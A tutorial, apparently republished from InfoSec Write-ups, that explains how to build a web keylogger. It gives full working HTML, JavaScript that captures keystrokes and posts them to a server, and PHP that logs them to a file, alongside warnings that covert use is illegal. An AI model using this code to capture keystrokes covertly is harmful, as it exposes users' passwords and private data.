Create a Keylogger using JavaScript & PHP
2023-12-19 01:4:9 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏

Frost

InfoSec Write-ups

In this article, you’ll learn how to create a simple keylogger using Javascript and PHP.

A keylogger (or keystroke logger) is a type of spyware that monitors and records what you type on your computer or mobile phone. The purpose is usually to gain access to personal information that a user types, such as passwords, banking information, and other private data.

Before we get started, I want you to know that keylogging is illegal if installed behind the back of the actual owner, in order to gain access to the owner’s personal information. So, use this information to expand your knowledge and not to cause malicious or damaging attacks.

Install Apache

First, you need a web server to host a basic HTML page. If you don’t have Apache web server installed on your Linux system, use the following command:

apt install apache2

Then change directory to the Apache web server location.

cd /var/www/html

This is the location where I will put the website files.

Basic HTML Page

In this step, I will create a basic webpage using nano text editor in the terminal.

nano index.html

Add the following code:

<!DOCTYPE html>
<html>
<head>
<title>Keylogger</title>
<meta charset="utf-8">
<style>
textarea {
width: 40%;
height: 200px;
font-size: 18px;

}
</style>
<script src="keylog.js"></script>
</head>
<body>
<h1>Everthing you type will be recorded!</h1>
<textarea></textarea>
</body>

Important things to know:

<script src=”keylog.js”></script>: Includes an external JavaScript file named “keylog.js” which I will create in the next step. This script will be responsible for handling keylogging functionality.

<textarea></textarea>: Creates a text area element where the user can type using the keyboard.

JavaScript Keylogger

Create a file called “keylog.js” using nano text editor.

nano keylog.js

Add the following code:

var keylog = {
// SETTINGS
cache : [], // temp storage for key presses
delay : 1000, // how often to send data to server
sending : false, // flag to allow 1 upload at a time

// INITIALIZE
init : () => {
// CAPTURE KEY STROKES
window.addEventListener("keydown", evt => keylog.cache.push(evt.key));

// SEND KEYSTROKES
window.setInterval(keylog.send, keylog.delay);
},

// AJAX
send : () => { if (!keylog.sending && keylog.cache.length != 0) {
// "LOCK" UNTIL THIS BATCH IS SENT TO SERVER
keylog.sending = true;
// KEYPRESS DATA
var data = new FormData();
data.append("keys", JSON.stringify(keylog.cache));
keylog.cache = []; // clear keys

// FECTH SEND
fetch("keylog.php", { method:"POST", body:data })
.then(res=>res.text()).then(res => {
keylog.sending = false; // unlock
console.log(res); // optional
})
.catch(err => console.error(err));
}}
};
window.addEventListener("DOMContentLoaded", keylog.init);

This code essentially creates a basic keylogger that captures key presses from the user on a webpage. The keylogger collects these key presses and sends them to a server.

The collected data is transmitted to a server-side script named “keylog.php” which you need to create in the next step.

Capture File

Create another file called “keylog.php”.

nano keylog.php

And add the following code:

?php
// (A) OPEN KEYLOG FILE, APPEND MODE
$file = fopen("keylog.txt", "a+");

// (B) SAVE KEYSTROKES
$keys = json_decode($_POST["keys"]);
foreach ($keys as $k=>$v) { fwrite($file, $v . PHP_EOL); }

// (C) CLOSE & END
fclose($file);
echo "OK";

This is a PHP script that saves the captured keystrokes to a text file called “keylog.txt”, so make sure to create a text file (keylog.txt) using nano text editor.

At this point you should have four files in the Apache web directory (/var/www/html). You can use “ls” command to list the files.

Here you can see all the files. Now restart the web server using:

service apache2 restart

And let’s access the webpage using my local IP address in the web browser.

In the box field (textarea) I will type “This keylogger works!”.

Now let’s switch to the Apache web server location and open “keylog.txt” file using nano.

nano keylog.txt

As you can see I have successfully captured the keystrokes.

Conclusion

In this article, you have learned how to create a keylogger using JavaScript and a little PHP. Also, please remember that is illegal and unethical to do keylogging without the user’s knowledge.

So if you want to capture the keystrokes for whatever purpose, please make sure that the users are fully aware that their keystrokes are being recorded.

Thank you for reading!


文章来源: https://infosecwriteups.com/create-a-keylogger-using-javascript-php-6d5da5f5f6f1?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh